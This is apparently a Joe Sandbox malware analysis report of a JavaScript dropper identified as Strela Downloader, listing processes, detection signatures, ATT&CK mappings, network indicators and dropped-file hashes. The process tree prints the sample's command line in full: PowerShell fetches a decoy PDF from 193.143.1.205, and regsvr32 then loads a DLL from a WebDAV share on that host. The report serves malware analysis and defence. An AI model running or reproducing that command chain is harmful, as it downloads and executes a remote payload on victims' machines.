Windows
Analysis Report
2572722545251923438.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 4928 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\25727 2254525192 3438.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 1036 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\129 5522471290 98.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3508 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 3504 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 4900 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 5580 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 4000 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --user-d ata-dir="C :\Users\us er\AppData \Local\CEF \User Data " --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 20 --field -trial-han dle=1544,i ,971653809 0490711592 ,124435780 3183466281 1,131072 - -disable-f eatures=Ba ckForwardC ache,Calcu lateNative WinOcclusi on,WinUseB rowserSpel lChecker / prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 6628 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 1 DLL Side-Loading | 31 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 2 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 31 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 22 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | ReversingLabs |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1587762 |
Start date and time: | 2025-01-10 17:47:07 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 1s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 18 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 2572722545251923438.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/63@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
- Excluded IPs from analysis (whitelisted): 184.28.88.176, 162.159.61.3, 172.64.41.3, 2.23.242.162, 23.209.209.135, 52.6.155.20, 3.219.243.226, 3.233.129.217, 52.22.41.97, 2.22.50.144, 2.22.50.131, 2.16.168.105, 2.16.168.107, 23.204.152.223, 23.204.152.208, 192.168.2.6, 13.107.246.45, 20.12.23.50, 104.126.112.182, 20.242.39.171, 52.149.20.212
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, armmf.adobe.com, geo2.adobe.com
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- VT rate limit hit for: 2572722545251923438.js
Time | Type | Description |
---|---|---|
11:48:06 | API Interceptor | |
11:48:10 | API Interceptor | |
11:48:10 | API Interceptor | |
11:48:17 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7263128147070701 |
Encrypted: | false |
SSDEEP: | 1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0Q:9JZj5MiKNnNhoxu9 |
MD5: | 783FC12367C621116D5BA57D3DDB2A73 |
SHA1: | 7DDEFF196122547CF995A7B290371563C5CCCBA0 |
SHA-256: | B01F80D515746BC50F96F8002C608688D6B459659FE3149C4C837D06037AC316 |
SHA-512: | C50CB60092977BA031F6D499655965121C79420390A6C5F0EE58D371C7211D976FE871194366A4AF6B426F1D7567795619C413BE8A49B9EB037E33CEB0510BCE |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7555393238583846 |
Encrypted: | false |
SSDEEP: | 1536:tSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:tazaSvGJzYj2UlmOlOL |
MD5: | 34C596B90DDCDBEC6E86033BE5E8D5DB |
SHA1: | 91955CEA451A16F274DF5DBEECA6DB7312CAC504 |
SHA-256: | D8EDDA8360FF779628F5D69F051C30074731BDE8D454D069B707E5977662BF63 |
SHA-512: | 2DCCEF3E2C89A572402EC843876EA02E1E90B8A42D63E1DC0867CA9C7C081233187EAC811FF37B6F40D037868CDA546BF707DF5DFF178E38371E18E8626C777E |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.0786563631924207 |
Encrypted: | false |
SSDEEP: | 3:Z/EYeYEYe73NaAPaU1lgd1v6tAlluxmO+l/SNxOf:uzH/TNDPaUYdl6tAgmOH |
MD5: | E52C0EEF731FA4863312B587B5CCD965 |
SHA1: | D532CDB505F9AE38318E13DBB7CB921404335E16 |
SHA-256: | 1D63B11ECECE41A815F240E8856119199E976DBF7035DB3C54973C4FF1608AEF |
SHA-512: | 9210493BED6C00798D199DC6DC59C6BF1D9910ED8D1C4EC86CA4518D23DFD20965D2A49FB9ADD1F2447399C50AF776A006998F9F0EDF0B01AD93926853574558 |
Malicious: | false |
Preview: |
